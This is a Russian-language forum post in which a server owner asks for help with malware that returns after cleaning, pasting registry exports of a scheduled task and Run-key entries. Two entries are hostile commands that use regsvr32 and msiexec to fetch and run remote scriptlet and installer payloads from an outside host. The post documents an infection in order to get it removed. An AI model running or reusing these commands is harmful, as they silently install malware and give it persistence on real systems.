Вложений: 2
Повторное появление вирусов после лечения.
Доброго времени суток.
Обращаюсь к Вам за помощью, так как лечение от вирусов моего сервера обычными средствами результата не приносит.
Суть проблемы в следующем.
Некоторое время назад сервер начал периодически самостоятельно перезагружаться. После перезагрузки появлялось окно с сообщением "Ваша операционная система восстановлена после непредвиденного завершения работы." После перезагрузки системы в реестре появляются следующие записи:
1.Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{84840316-6B17-4FCD-B692-43230923888C}]
[COLOR=#ff0000]"Path"="\\Mysa"[/COLOR]
"Hash"=hex:9b,88,74,00,58,06,1d,5e,69,76,56,ba,9d,a9,f1,c6,90,d8,a4,3f,da,8e,\
cd,62,0b,04,1c,68,0e,23,5f,f6
"Triggers"=hex:15,00,00,00,00,00,00,00,01,01,c6,01,00,00,00,00,00,76,39,0e,ed,\
25,d3,01,00,00,00,00,00,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,38,21,42,00,48,48,\
48,48,e3,4a,85,0e,48,48,48,48,00,48,48,48,48,48,48,48,00,48,48,48,48,48,48,\
48,05,00,00,00,48,48,48,48,0c,00,00,00,48,48,48,48,01,01,00,00,00,00,00,05,\
12,00,00,00,48,48,48,48,00,00,00,00,48,48,48,48,38,00,00,00,48,48,48,48,58,\
02,00,00,10,0e,00,00,80,f4,03,00,ff,ff,ff,ff,07,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,ff,ff,00,00,00,00,00,00,01,01,c6,01,00,00,00,00,00,76,39,0e,\
ed,25,d3,01,00,00,00,00,00,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,ff,\
ff,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,00,07,00,00,01,08,c6,01,00,00,\
00,00,05,00,00,00,00,00,00,00
"DynamicInfo"=hex:03,00,00,00,a5,ef,39,0b,d4,25,d3,01,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00
2.Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree[COLOR=#ff0000]\Mysa[/COLOR]]
"Id"="{84840316-6B17-4FCD-B692-43230923888C}"
"Index"=dword:00000001
3. Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RTHDVCPL"="C:\\Program Files\\Realtek\\Audio\\HDA\\RtkNGUI64.exe -s"
"egui"=""C:\\Program Files\\ESET\\ESET NOD32 Antivirus\\egui.exe" /hide /waitservice"
"Malwarebytes TrayApp"="C:\\PROGRAM FILES\\MALWAREBYTES\\ANTI-MALWARE\\mbamtray.exe"
[COLOR=#ff0000]"start"="regsvr32 /u /s /i:[url]http://js.mykings.top:280/v.sct[/url] scrobj.dll"
"start1"="msiexec.exe /i [url]http://js.mykings.top:280/helloworld.msi[/url] /q"[/COLOR]
Cкан Malwarebytes обнаруживает вирусы(лог прилагается malware.txt).
Также был запущен Autologger. Протокол работы autologger-а прилагается.
После лечения malwaerebytes и нового сканирования вирусы не обнаружены. Но, спустя некоторое время все повторяется вновь.
Помогите, пожалуйста, в моей проблеме.
За ранее благодарен.
